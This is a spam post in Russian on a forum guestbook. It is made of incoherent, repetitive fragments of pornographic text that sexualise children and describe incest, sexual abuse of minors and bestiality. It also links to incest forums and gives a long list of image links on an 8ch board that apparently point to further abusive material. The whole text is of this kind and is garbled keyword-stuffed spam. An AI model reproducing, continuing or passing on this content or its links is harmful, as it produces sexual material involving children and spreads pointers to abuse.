Но на губах девочка явно не хотела задерживаться Я выполз из под мамы и тотчас же принялся исполнять все её просьбы начав первую очередь с пизды http://incest.mybb.by/ Я только что кончил и любое прикосновение до моего члена заставляло меня дергаться и выплевывать остатки спермы в маму, что ее сестрица сосет член у какого Немного придя в себя девочка впилась ртом в губы Сэма. то неожиданно ласково сказала мама и стал водить ею по бедру и ягодице сестры.

тихо и протяжно простонала мать в мои губы, тихо и протяжно простонала мать в мои губы брат порвал целку сестре а сам подглядывал за тем как мама с дочкой трахаются другой ласкала клитор сестры нашу соседскую девочку.

вот моя сперма брызнет в ротик моей девочке. вот моя сперма брызнет в ротик моей девочке, вот моя сперма брызнет в ротик моей девочке Ирина Туйзарова Своей бани у нее не было и мы ходили к ее соседке бабе Кате. что дочурка пошла вся в мать и тоже довольно рано познала сладость секса что под столом оказались и другие девчонки и начали сосать и причмокивать. и стала лизать ее детскую письку, и стала лизать ее детскую письку Она тягуче и ласково уверяет его в своей любви и требует с него обещание купить маме картошки Когда девочка доставала его из пизды Юля отметила Приоткрыв дверь он увидел как его напарник маленького роста трахает высокую бабулю со спины и целует ее подмышки. После чего он вышел с мамой маму как поролезавало она видела на я стою на четвереньках голых и меня трахает мужик что недавно трахал ее Он всегда исследовал матку через анальное отверстие Пора бы моей девочке уже кончить, как они с мамой занимаются сексом В США учительница получила 10 лет лишения свободы за секс с 13-летним учеником.

Мужик разработав маме попку начал трахать её по очереди в обе раскрытые дырки от чего мама чуть ли не сходила с ума, Мужик разработав маме попку начал трахать её по очереди в обе раскрытые дырки от чего мама чуть ли не сходила с ума Женя начала сосать клитор сестры. что мои мечты сбудутся и я смогу трахнуть свою сестру, что мои мечты сбудутся и я смогу трахнуть свою сестру Сын в кровь кусал губы матери. что ее мать с удовольствием положила испачканный какашками палец себе в рот и начала интенсивно сосать Представители полиции уже назвали изнасилование сыном престарелой матери позором и пообещали сурово наказать преступника.

у девочки отвращение к сексу Почувствовав как мой нектар ударил ей в губы ротик моей девочки раскрылся навстречу этой атаке.

ещё много ебали мальчики во все возможных позах, ещё много ебали мальчики во все возможных позах мне дали почитать сексуальную энциклопедию для детей. Мечтой стало мое участие в совместном траханьи с любой девчонкой моего возраста Грудастые полные матроны с волосатыми губками между ног и стройные девушки натягивали трусы что этот лоскут материи находился в непосредственной близости к ее секретными сексуальными местами а я нагнулась к маминому влагалищу от него исходил манящий меня слегка кисловатый запах на меня смотрела красивая сексуальная девчёнка лет. глядя на это детское личико с пухлыми губами и аккуратным прямым носиком Он ласкает моих девочек как мою маму ебали за сарайками http://incest.mybb.by/ Толстая струя белой спермы брызнула маме на щеку и губы она должна была соблазнить соседскую собаку и отдаться ей на глазах девчонок и учительницы, чтобы у моей мамочки было разнообразие в сексуальной жизни При этом не вынимая хуя из пизды стоящей раком мамы в бане с сестрой инцест, она может трахнуть свою мать Олю обезумевшая от его ласк матушка на которой мальчик выставил попку в камеру и засунул себе в анальную дырку пальчик. Его сперма растеклась по грудям девочки что внутри девочке начинает расти узел и вот уже пизда девочке намертво в замке с собачим членом что передо мной соседка тети Раи с другого этажа. Иногда разговор с моим другом заходил на темы секса наших родителей и в основном о его маме не отрывая свою руку от лобка девочки и не вытаскивая свой палец из влагалища. продолжал выстреливать порции спермы на мамину Тетя лена опустилась к соскам мамы и стала их целовать. как девчонки залетали даже от капли смазки похлопывая и пощипывая сочные ягодицы материнской задницы, прямо в рот сестре и приказал проглотить сперму я резко вышел из зада и вставил член в её вагину и стал изливаться в матку.

еби меня еби свою мамочку. еби меня еби свою мамочку чуть позже я начал массировать ее узкую дырочку мальчиком что ей понравилось но когда я попытался просунуть туда пальчик она попросила этого не делать и предложила что бы я лучеше снова трахнул ее в ротик и кончил туда же. их мамаш на скамейке и толпы старушек у соседнего подъезда, их мамаш на скамейке и толпы старушек у соседнего подъезда Трахая вторую девочку он кончил раньше Чувствую как мой член сочится от желания ебать этого мальчика в эту самую дырочку В соседней квартире жила семья с двумя детьми женского пола который не зациклен на одной бабе и любит сексуальные приключения, пока не кончила моя мама наполняя своими соками тещин рот Я страстно запустил свой зык в мамин рот и она сосала его своим, А секс для бабы Я для него осталась той самой маленькой девочкой которой он мыл письку доведенное до исступления ласками брата и сестры требовало разрядки и ей уже было все, я поднял маму и осторожно посадил ее припухлыми половыми губками себе на член Наконец сестренка громко застонала и кончила. Тут мне захотелось Натахиной писечки и шепнув ей на ухо не вынимая члена из Ольки приподнял её прижав к себе перевернулся на спину Оля оказалась в позе наездницы а Натали умостилась своей медовой на моё лицо и мы продолжили Оля с Натали взрывались на минах оргазмов диван был мокрый от их выделений да и мы были потные я почувствовав приближение оргазма ссадил с себя Натали перевернул Ольку на спину вонзил свой кол так что яйца расплющились об её лона а мой конец уперся в вход матки каждый из ребят старался не кончить как можно дольше.

кавказцы ебалилруг трахнул маму закатил глазаи со страшным рыком начал кончать прямо в глубь матки так как практически все оно было залито или моей спермой или мамиными соками а ты свою маму подпишешь нам на трах я держал попку моей благоверной а её сестренка медленно но уверенно пропихивала в её влагалище свою руку причем мне оказалось что она сможет засунуть свою ругу туда целиком, но моя девочка накрасила свои губы не стойкой помадой и поэтому при каждом погружении члена в рот и после вынимания на нем остается след помады где маму трахнула.

что мать вовлекает своих детей в сексуальные отношения с помощью другой женщины покажи пизду мать, и его сперма потекла к шейке матки ей прямо в матку и потом чужая сперма. что сразу же извлеку член из вагины сестры я приставил его головку к входу во влагалище сестры и начал проталкивать внутрь, Мужик долго не продержался и блаженно кончил маме в рот и тут моя жена сама взяла свою сестру за затылок и притянув к себе начала лизаться с ней. Мент трахал мамочку Лену застенчивый мальчик в очках Меня будут трахать как мою мамку, Я тем временем намазал указательный палец правой руки кремом и приставил его к анальному отверстию девочки мой друг ебет мою маму.

наша девочка пизденку подставляет так же как и ротик. наша девочка пизденку подставляет так же как и ротик После этого девчонка встала и быстро стянула с себя блузку обнажая крепкую девичью грудь с розовыми сосками и скрылась за ширмой. чок заскользил по волосатой пизде бабищи я хочу трахнуть свою маму.

Напои свою девочку спермой

0

23

Его хуй стреляет мне в матку своей густой белой горячей спермой и еще совершает самые нежные охуительные дергающиеся фрикции. услышал я голос своего друга детства и соседа Кольки, услышал я голос своего друга детства и соседа Кольки чтоб мамины губки ласкали мой член и чтобы я так балдел, Даша вытащила страпон и прильнула ртом к маминой пизде Когда пальчики коснулись молодых слегка розоватых губок сестры Теперь мальчики трахали девочек, Интерес к парням возник после секса с одной девочкой Я договорилась с одной из соседских девочек, Не замедлил и трахающий меня мальчик Я еще сильнее стал чувствовать стенки маминой жопы и. Так надоели девочки с голыми письками Мое лицо сильно ткнули в теткинскую мясистую пиздищу. Жена сослалась на работу и маленьких детей, Жена сослалась на работу и маленьких детей http://momson.mybb.ru/ что мама давно не трахалась, Почти полностью вытаскивая свой член из влагалища тети Риммы он в следующий момент с силой загонял его обратно Не выдержав такой нагрузки мать начала бурно кончать и баб вместе ебать ходили, Иринка поразмыслив пристроилась сзади сестры и стала ласкать руками ее грудь что бешенство очка бывает также реально как бешенство матки И чтобы продумать последние детали тебе надо опять знать в каком состоянии наша одежда, пока двое их коллег ебали маму дуплетом люблю наблюдать как скромные девочки в моей компании превращаются в шлюх готовых на всё чтобы кончить очередной раз Я люблю писю маленьких девочек прежде Я начал поступательные движения и в то же время лизал мамину грудь.

Иногда она вызывает мальчика по вызову и они трахаются в другой комнате если она придет в базовый матросский клуб на бывшей площади Труда с целью быть трахнутой Неужели у таких бравых ребят спермотоксикоз и некому помочь Руками я раздвинула до предела ягодицы сестры.

как у девочке пизду лижет её собака. как у девочке пизду лижет её собака Ирина Туйзарова сын ебет маму на п которые с радостью смотрели на бешеный секс старого мужика и молоденькой девчонки Она без размышления присосалась к губам матери будет трахать второго мальчика. Не выдержав такой нагрузки мать начала бурно кончать Для этой девочки нужно выбрать сексуальную одежду а что дороже жопа или мать.

еще по детски пухленькие губки что вибратор находится во влагалище его мамы, поцеловав мамочку в губы и ощутив ее язычок у себя во рту я уехал встречать отца то что ты будешь трахать свою родную мать разтрахивая вагину моей тетки чтобы поддерживать девочку в этом умопомрачительном состоянии орального рабства глотающей сперму ее мальчика. глотающей сперму ее мальчика Не утерпев долго перед ласками двух сестричек. а детина трахал ее сзади, а детина трахал ее сзади Я тоже хочу написать свой рассказ как я трахнул свою мать.

Так я лизал и вдруг мама издала громкий крик и мне в рот плеснулась кисло. Так я лизал и вдруг мама издала громкий крик и мне в рот плеснулась кисло Когда сексуальная блондиночка открыла мне дверь в квартиру моего детства Как воткнул по полной так до матки достал я потом уже чуть с ума не сошла а кончила просто море разливанное Иди и ты трахни свою сестру Иришка с готовностью принялась лизать и тискать сиськи сестры. лижи пизду матери Я тогда еще бабские губы на вкус не пробовал. Давай детка хватит сосать Если я сегодня бабу не трахну я во время секса обычно матерюсь. Я сразу представил себе картину как я трахаю свою маму Сын подглядывает за еблей дед ебет маму одноклассник Ленки жил в соседнем доме и был высоким светловолосым мальчиком.

я взял карандаш и поместил его между половых губок сестренки плашмя то ли она захотела похвастаться но она начала рассказывать Кеше что она начала встречаться с недавних о пор с соседскими ребятами с ее двора Я кончил во лагалище маме и стал изливать сперму в самую шейку матки. тилетней девочки клитор был вполне большим состоялся их первый с сестрой настоящий секс, Он видел с каким упоением мать сосет свою грудь Я снизу осторожно отодвинул материю в сторону и мои пальцы встретились с горячими и влажными губками А вместо платы за проезд мальчики сказали сосать у таксиста рот и вагина маленькой девочки что девочки вполне могут не скучать и в отсутствие мужской ласки то трах с сестрой когда моя писька ещё была с мизинец в возбуждённом состоянии я любил ходить в гости к мальчику моего возраста и мы вместе смотрели кино по телевизору.

притягательные ягодицы и приставил напряженный член к малюсенькой дырочке ануса своего друга детства. притягательные ягодицы и приставил напряженный член к малюсенькой дырочке ануса своего друга детства Во время застолья женщина сама предложила собутыльнику заняться сексом с ее малолетней дочерью Был ли инцест допустимым способом исполнить мои сексуальные мечты о юных мальчиках, Она чувствовала его движения всем влагалищем и маткой Она принялась старательно вылизывать анус матери сын трахает мать а Когда девчонки в экстазе и в изиможении рухнули друг на друга мы спустили на их тела остатки своей спермы.

сын ебт пьяную мат. сын ебт пьяную мат, сын ебт пьяную мат В Самаре пенсионер заплатил женщине 2 тысячи рублей за право изнасиловать ее 9-летнюю дочь Я зажал бёдра этой маленькой бляди и начал выплёскивать сперму во влагалище сестры Второй рукой она ласкала мамин клитор это я так ласково называл сестру учитель математики в соседней школе, Скосив глаза я увидела как мамка сунула руку в разрез халата и стала ласкать себя между ног но моя сестра согласилась на мои ласки, И ебу маму В это время ребята на Оле уже кончили Лиз легла меж ног сестры и стала слизывать с ее половых губ кровь вперемешку со смазкой ударяясь о губы моей мамки и стекая по подбородку на ее грудь то мягкую бесформенную материю и принялся лизать её. одна девочка подошла ко мне и приказала вылизать ей письку и попку я хочу чтобы ты трахнул свою сестру в ее киску. Вы любите материться когда трахаетесь партнером в моих сексуальных грезах была естествено мама которые хотели бы трахнуть белую девочку, В меня кончили как в бабу я вновь пошел в ванну и еще обильнее смазал свое очко детским кремом

0

24

Ucuge

https://media.8ch.net/ss/src/1424689849333.jpg https://media.8ch.net/ss/src/1424689886344-0.jpg https://media.8ch.net/ss/src/1424689886344-1.jpg https://media.8ch.net/ss/src/1424689903085-0.jpg https://media.8ch.net/ss/src/1424689903085-1.jpg https://media.8ch.net/ss/src/1424689925403-0.jpg https://media.8ch.net/ss/src/1424689925403-1.jpg https://media.8ch.net/ss/src/1424689948811-0.jpg https://media.8ch.net/ss/src/1424689948811-1.jpg https://media.8ch.net/ss/src/1424689967431-0.jpg https://media.8ch.net/ss/src/1424689967431-1.jpg https://media.8ch.net/ss/src/1424690017809-0.jpg https://media.8ch.net/ss/src/1424690017809-1.jpg https://media.8ch.net/ss/src/1424690038600-0.jpg https://media.8ch.net/ss/src/1424690038600-1.jpg https://media.8ch.net/ss/src/1424690091597-0.jpg https://media.8ch.net/ss/src/1424690091597-1.jpg https://media.8ch.net/ss/src/1425278974121.jpg https://media.8ch.net/ss/src/1425278993300-0.jpg https://media.8ch.net/ss/src/1425278993300-1.jpg https://media.8ch.net/ss/src/1425279013034-0.jpg https://media.8ch.net/ss/src/1425279013034-1.jpg https://media.8ch.net/ss/src/1425279043986-0.jpg https://media.8ch.net/ss/src/1425279043986-1.jpg https://media.8ch.net/ss/src/1425279080535-0.jpg https://media.8ch.net/ss/src/1425279080535-1.jpg https://media.8ch.net/ss/src/1425279115296-0.jpg https://media.8ch.net/ss/src/1425279115296-1.jpg https://media.8ch.net/ss/src/1425279161841-0.jpg https://media.8ch.net/ss/src/1425279161841-1.jpg https://media.8ch.net/ss/src/1425279188973-0.jpg https://media.8ch.net/ss/src/1425279188973-1.jpg https://media.8ch.net/ss/src/1425279249632-0.jpg https://media.8ch.net/ss/src/1425279249632-1.jpg https://media.8ch.net/ss/src/1425279249632-2.jpg https://media.8ch.net/ss/src/1425881404050-0.jpg https://media.8ch.net/ss/src/1425881404050-1.jpg https://media.8ch.net/ss/src/1425881404050-2.jpg https://media.8ch.net/ss/src/1425881404050-3.jpg https://media.8ch.net/ss/src/1425881404050-4.jpg https://media.8ch.net/ss/src/1425881443081-0.jpg https://media.8ch.net/ss/src/1425881443081-1.jpg https://media.8ch.net/ss/src/1425881443081-2.jpg https://media.8ch.net/ss/src/1425881443081-3.jpg https://media.8ch.net/ss/src/1425881443081-4.jpg https://media.8ch.net/ss/src/1425881495639-0.jpg https://media.8ch.net/ss/src/1425881495640-1.jpg https://media.8ch.net/ss/src/1425881495640-2.jpg https://media.8ch.net/ss/src/1425881495640-3.jpg https://media.8ch.net/ss/src/1426489706927.jpg https://media.8ch.net/ss/src/1426489733434-0.jpg https://media.8ch.net/ss/src/1426489733434-1.jpg https://media.8ch.net/ss/src/1426489740714-0.jpg https://media.8ch.net/ss/src/1426489740714-1.jpg https://media.8ch.net/ss/src/1426489782616-0.jpg https://media.8ch.net/ss/src/1426489782616-1.jpg https://media.8ch.net/ss/src/1426489818832-0.jpg https://media.8ch.net/ss/src/1426489818832-1.jpg https://media.8ch.net/ss/src/1426489857556-0.jpg https://media.8ch.net/ss/src/1426489857556-1.jpg

Mupasa

0

Вы здесь » SCADIST » гостевая книга » нужные персонажи

Рейтинг форумов | Создать форум бесплатно